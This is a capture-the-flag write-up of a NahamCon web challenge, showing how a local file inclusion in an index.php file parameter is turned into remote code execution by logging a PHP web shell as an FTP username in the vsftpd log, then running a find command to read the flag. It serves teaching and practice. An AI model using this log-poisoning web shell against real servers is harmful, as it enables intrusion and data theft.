Tags: rce lfi log_poisoning 


We have two links in task – website of logging service and ftp_server. We can guess that it is ftp server, because of "FTP can be used to access raw files if needed" in logging service description, or by connecting via netcat:

~ nc challenge.nahamcon.com 30199
220 Welcome to FTP Server

But unfortunately we can't get access to FTP because we don't know username and password:

~ ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev): idontknowusername
331 Please specify the password.
Password: idontknowpassword
530 Login incorrect.
ftp: Login failed.

Let's examine site a bit more, button "Learn more about our pricing" send us to http://challenge.nahamcon.com:31042/index.php?file=pricing. We can see that filename sends as GET param, so we can try local file enclusion. LFI But we don't know in which file flag is, so we should find a way to execute remote code on server. I tried some ways from this cheat sheet , but nothing worked. From /etc/passwd we can find out that logging service use apache as webserver and vsftpd as FTP server:


We can control content of their logs, so if we can open apache or vsfpd logs we can inject php code on site and execute remote code. We can't open apache logs /var/log/apache2/access.log but /var/log/vsftpd.log works. vsftpd logs We can see that vsftpd logs username, so if it will be valid php code in <?php tag it will work. Let's try <?php system($_GET['cmd']); ?>, so we can execute bash command from cmd GET param.

ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev): <?php system($_GET['cmd']); ?>
331 Please specify the password.
530 Login incorrect.
ftp: Login failed.

Let's use find / -name 'flag.txt' | xargs cat command that will recursively search for flag.txt file, starting from root directory and cat its content. flag